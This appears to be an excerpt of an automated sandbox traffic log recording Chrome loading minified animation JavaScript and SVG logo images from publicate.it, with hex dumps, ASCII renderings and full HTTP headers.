                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 28 74 68 69 73 2e 74 69 6d 65 72 26 26 74 68 69 73 2e 74 69 6d 65 72 2e 64 65 73 74 72 6f 79 28 29 2c 74 68 69 73 2e 71 75 65 75 65 3d 5b 5d 2c 74 68 69 73 2e 61 63 74 69 76 65 3d 21 31 29 2c 67 65 3d 3d 22 6e 75 6d 62 65 72 22 26 26 76 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 74 69 6d 65 72 3d 6e 65 77 20 74 65 28 7b 64 75 72 61 74 69 6f 6e 3a 6c 65 2c 63 6f 6e 74 65 78 74 3a 74 68 69 73 2c 63 6f 6d 70 6c 65 74 65 3a 5a 7d 29 2c 76 6f 69 64 28 74 68 69 73 2e 61 63 74 69 76 65 3d 21 30 29 3b 69 66 28 67 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 76 65 29 7b 73 77 69 74 63 68 28 6c 65 29 7b 63 61 73 65 22 68 69 64 65 22 3a 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 74 6f 70 22 3a 61 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 62
                                                                                                                                                                                                        Data Ascii: (this.timer&&this.timer.destroy(),this.queue=[],this.active=!1),ge=="number"&&ve)return this.timer=new te({duration:le,context:this,complete:Z}),void(this.active=!0);if(ge=="string"&&ve){switch(le){case"hide":ne.call(this);break;case"stop":ae.call(this);b
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 3d 7b 7d 2c 76 65 5b 6c 65 5d 3d 31 29 3a 76 65 3d 74 79 70 65 6f 66 20 6c 65 3d 3d 22 6f 62 6a 65 63 74 22 26 26 6c 65 21 3d 6e 75 6c 6c 3f 6c 65 3a 74 68 69 73 2e 70 72 6f 70 73 2c 50 74 2e 63 61 6c 6c 28 74 68 69 73 2c 76 65 2c 6a 65 29 2c 5f 65 2e 63 61 6c 6c 28 74 68 69 73 29 7d 66 75 6e 63 74 69 6f 6e 20 73 65 28 6c 65 29 7b 61 65 2e 63 61 6c 6c 28 74 68 69 73 2c 6c 65 29 2c 50 74 2e 63 61 6c 6c 28 74 68 69 73 2c 6c 65 2c 4d 6e 2c 6f 77 29 7d 66 75 6e 63 74 69 6f 6e 20 64 65 28 6c 65 29 7b 74 79 70 65 6f 66 20 6c 65 21 3d 22 73 74 72 69 6e 67 22 26 26 28 6c 65 3d 22 62 6c 6f 63 6b 22 29 2c 74 68 69 73 2e 65 6c 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 6c 65 7d 66 75 6e 63 74 69 6f 6e 20 6e 65 28 29 7b 61 65 2e 63 61 6c 6c 28 74 68 69 73 29 2c 74
                                                                                                                                                                                                        Data Ascii: ={},ve[le]=1):ve=typeof le=="object"&&le!=null?le:this.props,Pt.call(this,ve,je),_e.call(this)}function se(le){ae.call(this,le),Pt.call(this,le,Mn,ow)}function de(le){typeof le!="string"&&(le="block"),this.el.style.display=le}function ne(){ae.call(this),t
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 2e 73 74 79 6c 65 3d 22 22 2c 74 68 69 73 2e 61 63 74 69 76 65 3d 21 31 2c 69 65 2e 6b 65 65 70 49 6e 68 65 72 69 74 65 64 26 26 21 69 65 2e 66 61 6c 6c 62 61 63 6b 29 7b 76 61 72 20 76 65 3d 65 65 28 74 68 69 73 2e 65 6c 2c 22 74 72 61 6e 73 69 74 69 6f 6e 22 29 3b 76 65 26 26 21 4c 2e 74 65 73 74 28 76 65 29 26 26 28 74 68 69 73 2e 75 70 73 74 72 65 61 6d 3d 76 65 29 7d 4b 2e 62 61 63 6b 66 61 63 65 26 26 69 65 2e 68 69 64 65 42 61 63 6b 66 61 63 65 26 26 42 28 74 68 69 73 2e 65 6c 2c 4b 2e 62 61 63 6b 66 61 63 65 2e 63 73 73 2c 22 68 69 64 64 65 6e 22 29 7d 2c 66 74 28 22 61 64 64 22 2c 6a 29 2c 66 74 28 22 73 74 61 72 74 22 2c 57 29 2c 66 74 28 22 77 61 69 74 22 2c 59 29 2c 66 74 28 22 74 68 65 6e 22 2c 55 29 2c 66 74 28 22 6e 65 78 74 22 2c 5a 29 2c
                                                                                                                                                                                                        Data Ascii: .style="",this.active=!1,ie.keepInherited&&!ie.fallback){var ve=ee(this.el,"transition");ve&&!L.test(ve)&&(this.upstream=ve)}K.backface&&ie.hideBackface&&B(this.el,K.backface.css,"hidden")},ft("add",j),ft("start",W),ft("wait",Y),ft("then",U),ft("next",Z),
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 6c 74 55 6e 69 74 2c 74 68 69 73 2e 61 6e 67 6c 65 3d 64 65 2e 61 6e 67 6c 65 7c 7c 74 68 69 73 2e 61 6e 67 6c 65 7c 7c 69 65 2e 64 65 66 61 75 6c 74 41 6e 67 6c 65 2c 69 65 2e 66 61 6c 6c 62 61 63 6b 7c 7c 64 65 2e 66 61 6c 6c 62 61 63 6b 3f 74 68 69 73 2e 61 6e 69 6d 61 74 65 3d 74 68 69 73 2e 66 61 6c 6c 62 61 63 6b 3a 28 74 68 69 73 2e 61 6e 69 6d 61 74 65 3d 74 68 69 73 2e 74 72 61 6e 73 69 74 69 6f 6e 2c 74 68 69 73 2e 73 74 72 69 6e 67 3d 74 68 69 73 2e 6e 61 6d 65 2b 41 2b 74 68 69 73 2e 64 75 72 61 74 69 6f 6e 2b 22 6d 73 22 2b 28 74 68 69 73 2e 65 61 73 65 21 3d 22 65 61 73 65 22 3f 41 2b 76 5b 74 68 69 73 2e 65 61 73 65 5d 5b 30 5d 3a 22 22 29 2b 28 74 68 69 73 2e 64 65 6c 61 79 3f 41 2b 74 68 69 73 2e 64 65 6c 61 79 2b 22 6d 73 22 3a 22 22 29
                                                                                                                                                                                                        Data Ascii: ltUnit,this.angle=de.angle||this.angle||ie.defaultAngle,ie.fallback||de.fallback?this.animate=this.fallback:(this.animate=this.transition,this.string=this.name+A+this.duration+"ms"+(this.ease!="ease"?A+v[this.ease][0]:"")+(this.delay?A+this.delay+"ms":"")


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        59192.168.2.549815104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC783OUTGET /images/logo_white_text.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:21 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 3746
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "ea2-620aa1d26bed1"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0BBrMKLtMud1zBP8b2lFq%2F4d1USi0sR3RyyWzefErZrw1upBIGWjpJvW7H3l4aCogla2bc4yQuUo0wYxpxgwhOihn7DomOHs4xu7qyCb0qHtEz0dBjcRdTm0MD%2Fbjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615b1189b422e-EWR
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC622INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 20 31 38 2e 31 2e 31 2c 20 53 56 47 20 45 78 70 6f 72 74 20 50 6c 75 67 2d 49 6e 20 2e 20 53 56 47 20 56 65 72 73 69 6f 6e 3a 20 36 2e 30 30 20 42 75 69 6c 64 20 30 29 20 20 2d 2d 3e 0d 0a 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 69 64 3d 22 4c 61 79 65 72 5f 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 3d 22 30 70 78 22 20 79
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?>... Generator: Adobe Illustrator 18.1.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) --><svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 2e 31 2c 34 36 2e 33 2c 33 32 2e 32 2c 34 36 2e 33 7a 20 4d 33 32 2e 39 2c 35 32 2e 33 63 2d 30 2e 34 2c 30 2e 34 2d 30 2e 39 2c 30 2e 36 2d 31 2e 34 2c 30 2e 36 0d 0a 09 09 09 09 73 2d 31 2d 30 2e 32 2d 31 2e 34 2d 30 2e 36 63 2d 30 2e 34 2d 30 2e 34 2d 30 2e 36 2d 31 2d 30 2e 36 2d 31 2e 37 63 30 2d 30 2e 37 2c 30 2e 32 2d 31 2e 33 2c 30 2e 36 2d 31 2e 37 63 30 2e 34 2d 30 2e 35 2c 30 2e 38 2d 30 2e 37 2c 31 2e 34 2d 30 2e 37 63 30 2e 36 2c 30 2c 31 2c 30 2e 32 2c 31 2e 34 2c 30 2e 37 73 30 2e 36 2c 31 2c 30 2e 36 2c 31 2e 37 0d 0a 09 09 09 09 43 33 33 2e 35 2c 35 31 2e 33 2c 33 33 2e 34 2c 35 31 2e 38 2c 33 32 2e 39 2c 35 32 2e 33 7a 20 4d 34 33 2c 35 30 2e 39 63 30 2c 30 2e 36 2d 30 2e 32 2c 31 2e 31 2d 30 2e 35 2c 31 2e 35 63 2d 30 2e 33 2c 30 2e 33
                                                                                                                                                                                                        Data Ascii: .1,46.3,32.2,46.3z M32.9,52.3c-0.4,0.4-0.9,0.6-1.4,0.6s-1-0.2-1.4-0.6c-0.4-0.4-0.6-1-0.6-1.7c0-0.7,0.2-1.3,0.6-1.7c0.4-0.5,0.8-0.7,1.4-0.7c0.6,0,1,0.2,1.4,0.7s0.6,1,0.6,1.7C33.5,51.3,33.4,51.8,32.9,52.3z M43,50.9c0,0.6-0.2,1.1-0.5,1.5c-0.3,0.3
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 34 2d 30 2e 36 2c 33 2e 35 2d 31 2e 37 6c 2d 31 2e 34 2d 31 2e 36 43 37 32 2e 35 2c 35 32 2e 34 2c 37 31 2e 38 2c 35 32 2e 38 2c 37 31 2c 35 32 2e 38 7a 20 4d 38 32 2e 32 2c 34 37 63 2d 30 2e 36 2d 30 2e 35 2d 31 2e 35 2d 30 2e 38 2d 32 2e 35 2d 30 2e 38 63 2d 31 2e 34 2c 30 2d 32 2e 37 2c 30 2e 34 2d 33 2e 38 2c 31 2e 32 6c 31 2c 31 2e 35 0d 0a 09 09 09 09 63 30 2e 33 2d 30 2e 32 2c 30 2e 37 2d 30 2e 34 2c 31 2e 31 2d 30 2e 36 73 30 2e 39 2d 30 2e 32 2c 31 2e 33 2d 30 2e 32 63 30 2e 39 2c 30 2c 31 2e 34 2c 30 2e 34 2c 31 2e 34 2c 31 2e 33 76 30 2e 31 68 2d 31 2e 37 63 2d 31 2e 31 2c 30 2d 31 2e 39 2c 30 2e 32 2d 32 2e 36 2c 30 2e 36 63 2d 30 2e 36 2c 30 2e 34 2d 30 2e 39 2c 31 2e 31 2d 30 2e 39 2c 31 2e 39 0d 0a 09 09 09 09 63 30 2c 30 2e 39 2c 30 2e 33
                                                                                                                                                                                                        Data Ascii: 4-0.6,3.5-1.7l-1.4-1.6C72.5,52.4,71.8,52.8,71,52.8z M82.2,47c-0.6-0.5-1.5-0.8-2.5-0.8c-1.4,0-2.7,0.4-3.8,1.2l1,1.5c0.3-0.2,0.7-0.4,1.1-0.6s0.9-0.2,1.3-0.2c0.9,0,1.4,0.4,1.4,1.3v0.1h-1.7c-1.1,0-1.9,0.2-2.6,0.6c-0.6,0.4-0.9,1.1-0.9,1.9c0,0.9,0.3
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC386INData Raw: 65 77 20 20 20 20 22 3e 0d 0a 09 3c 67 20 69 64 3d 22 53 68 61 70 65 5f 31 22 3e 0d 0a 09 09 3c 67 3e 0d 0a 09 09 09 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 36 39 30 31 46 22 20 64 3d 22 4d 31 31 2e 37 2c 33 38 2e 33 43 35 2e 32 2c 33 38 2e 33 2c 30 2c 34 33 2e 36 2c 30 2c 35 30 73 35 2e 32 2c 31 31 2e 37 2c 31 31 2e 37 2c 31 31 2e 37 53 32 33 2e 33 2c 35 36 2e 34 2c 32 33 2e 33 2c 35 30 53 31 38 2e 31 2c 33 38 2e 33 2c 31 31 2e 37 2c 33 38 2e 33 7a 20 4d 31 33 2c 35 32 2e 36 0d 0a 09 09 09 09 76 2d 31 2e 38 63 31 2e 31 2d 30 2e 32 2c 32 2d 31 2e 32 2c 32 2d 32 2e 34 63 30 2d 31 2e 34 2d 31 2e 31 2d 32 2e 34 2d 32 2e 34 2d 32 2e 34 73 2d 32 2e 34 2c 31 2e 31 2d 32 2e 34 2c 32 2e 34 76 32 2e 34 68 32 2e 34 76 31 2e 38 68 2d 32 2e 34 76 32 2e 38 48 38 2e
                                                                                                                                                                                                        Data Ascii: ew "><g id="Shape_1"><g><path fill="#F6901F" d="M11.7,38.3C5.2,38.3,0,43.6,0,50s5.2,11.7,11.7,11.7S23.3,56.4,23.3,50S18.1,38.3,11.7,38.3z M13,52.6v-1.8c1.1-0.2,2-1.2,2-2.4c0-1.4-1.1-2.4-2.4-2.4s-2.4,1.1-2.4,2.4v2.4h2.4v1.8h-2.4v2.8H8.


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        60192.168.2.549819104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC548OUTGET /images/trustedby.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC745INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:20 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 3391
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "d3f-620aa1d27a932"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JhtOsvnrCFvS3QWUG2C0BIMn5iFxEg9q2LJmJD6wut1H4gvZiaDVIz89XtqbDHLzu8XuzujtihUFKTorhsje8VLNWqTdo4KUe2wBF%2BAxZde9CuDqsmW3SzfX1eCJgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615b20d5372b6-EWR
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC624INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 39 38 70 78 22 20 68 65 69 67 68 74 3d 22 31 32 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 39 38 20 31 32 30 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 53 6b 65 74 63 68 20 36 31 20 28 38 39 35 38 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 73 6b 65 74 63 68 2e 63 6f 6d 20 2d 2d 3e 0a 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="298px" height="120px" viewBox="0 0 298 120" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> ... Generator: Sketch 61 (89581) - https://sketch.com -->
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 39 2e 30 38 36 37 33 31 32 2c 39 36 2e 34 38 35 31 36 20 43 37 31 2e 31 34 35 37 34 37 38 2c 39 36 2e 34 38 35 31 36 20 37 33 2e 32 30 30 38 34 36 39 2c 37 35 2e 33 36 36 38 39 37 35 20 37 33 2e 32 30 30 38 34 36 39 2c 37 35 2e 33 36 36 38 39 37 35 20 4c 35 37 2e 36 36 36 37 34 30 38 2c 37 35 2e 33 36 36 38 39 37 35 20 43 35 37 2e 36 36 36 37 34 30 38 2c 37 35 2e 33 36 36 38 39 37 35 20 35 34 2e 33 33 36 30 39 38 32 2c 38 36 2e 37 33 38 32 37 30 31 20 33 38 2e 31 33 39 31 31 37 2c 38 36 2e 37 33 38 32 37 30 31 20 43 32 34 2e 39 34 37 31 31 38 33 2c 38 36 2e 37 33 38 32 37 30 31 20 31 35 2e 34 35 38 39 31 35 37 2c 37 37 2e 38 32 36 36 38 38 33 20 31 35 2e 34 35 38 39 31 35 37 2c 36 35 2e 33 33 35 38 30 39 39 20 4c 37 34 2e 38 32 35 33 32 38 36 2c 36 35 2e
                                                                                                                                                                                                        Data Ascii: 9.0867312,96.48516 C71.1457478,96.48516 73.2008469,75.3668975 73.2008469,75.3668975 L57.6667408,75.3668975 C57.6667408,75.3668975 54.3360982,86.7382701 38.139117,86.7382701 C24.9471183,86.7382701 15.4589157,77.8266883 15.4589157,65.3358099 L74.8253286,65.
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 36 31 33 38 38 2c 34 39 2e 31 37 31 31 34 35 35 20 39 37 2e 33 32 39 33 31 31 34 2c 33 36 2e 35 34 38 35 35 33 37 20 31 31 33 2e 32 36 30 33 37 34 2c 33 36 2e 35 34 38 35 35 33 37 20 5a 22 20 69 64 3d 22 62 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 38 39 2e 30 36 39 35 32 31 2c 32 36 2e 30 39 30 39 35 33 34 20 43 31 35 37 2e 35 32 30 32 38 31 2c 32 36 2e 30 39 30 39 35 33 34 20 31 35 35 2e 34 39 36 39 30 32 2c 34 33 2e 33 36 35 37 37 32 36 20 31 35 35 2e 34 39 36 39 30 32 2c 34 36 2e 31 32 36 32 32 37 38 20 4c 31 37 31 2e 32 30 30 32 32 31 2c 34 36 2e 31 32 36 32 32 37 38 20 43 31 37 31 2e 32 30 30 32 32 31 2c 34 36 2e 31 32 36 32 32 37 38 20 31 37 32 2e 30 32 33 36 39 39 2c 33 36 2e 30 34 30 39 30
                                                                                                                                                                                                        Data Ascii: 61388,49.1711455 97.3293114,36.5485537 113.260374,36.5485537 Z" id="b"></path> <path d="M189.069521,26.0909534 C157.520281,26.0909534 155.496902,43.3657726 155.496902,46.1262278 L171.200221,46.1262278 C171.200221,46.1262278 172.023699,36.04090
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC29INData Raw: 0a 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 3c 2f 67 3e 0a 3c 2f 73 76 67 3e
                                                                                                                                                                                                        Data Ascii: </g> </g></svg>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        61192.168.2.549818104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC547OUTGET /images/download.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC752INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:20 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 6924
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "1b0c-620aa1d153a60"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E1jHcyFML3zHNtD42xXpQ0rrPl9riBqE4gRMK2crBl02mluFCZWoku05uZZ%2BDm%2FKFXGRQinZcFm0f7DtFh1S9v9LMCzTjxJVTbhlM%2BNBhfcCRQNzvcpCVsQFCnn%2FLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615b1ff5cc346-EWR
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC617INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 32 32 22 20 68 65 69 67 68 74 3d 22 32 37 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 32 20 32 37 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 20 20 20 20 3c 67 20 66 69 6c 6c 3d 22 23 46 46 46 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 6e 6f 6e 7a 65 72 6f 22 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 6d 30 20 39 2e 39 31 33 20 31 31 2e 31 38 31 2e 30 30 32 20 36 2e 38 2e 30 30 31 56 33 2e 31 38 31 7a 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 37 2e 39 38 20 33 2e 31 38 76 32 33 2e 37 38 31 4c 32 36 2e 34 37 32 20 30 7a 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 37 2e 39 38 20 39
                                                                                                                                                                                                        Data Ascii: <svg width="122" height="27" viewBox="0 0 122 27" xmlns="http://www.w3.org/2000/svg"> <g fill="#FFF" fill-rule="nonzero"> <path d="m0 9.913 11.181.002 6.8.001V3.181z"/> <path d="M17.98 3.18v23.781L26.472 0z"/> <path d="M17.98 9
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 37 34 20 31 2e 34 34 2d 32 2e 37 34 36 61 36 2e 36 32 31 20 36 2e 36 32 31 20 30 20 30 20 31 20 32 2e 34 30 32 2d 31 2e 38 31 63 2e 39 36 2d 2e 34 33 35 20 32 2e 30 39 2d 2e 36 35 33 20 33 2e 33 38 37 2d 2e 36 35 33 2e 36 34 20 30 20 31 2e 32 31 39 2e 30 35 38 20 31 2e 37 33 36 2e 31 37 32 2e 35 31 37 2e 31 31 35 2e 39 36 38 2e 32 35 31 20 31 2e 33 35 35 2e 34 30 37 2e 33 38 35 2e 31 35 36 2e 37 30 35 2e 33 32 2e 39 36 2e 34 39 32 2e 32 35 34 2e 31 37 33 2e 34 34 37 2e 33 31 37 2e 35 37 39 2e 34 33 31 2e 31 34 38 2e 31 33 32 2e 32 37 35 2e 32 38 38 2e 33 38 32 2e 34 36 38 2e 31 30 36 2e 31 38 31 2e 31 36 2e 33 37 38 2e 31 36 2e 35 39 31 20 30 20 2e 33 32 39 2d 2e 31 32 34 2e 36 35 37 2d 2e 33 37 2e 39 38 36 61 37 2e 31 32 20 37 2e 31 32 20 30 20 30 20 31
                                                                                                                                                                                                        Data Ascii: 74 1.44-2.746a6.621 6.621 0 0 1 2.402-1.81c.96-.435 2.09-.653 3.387-.653.64 0 1.219.058 1.736.172.517.115.968.251 1.355.407.385.156.705.32.96.492.254.173.447.317.579.431.148.132.275.288.382.468.106.181.16.378.16.591 0 .329-.124.657-.37.986a7.12 7.12 0 0 1
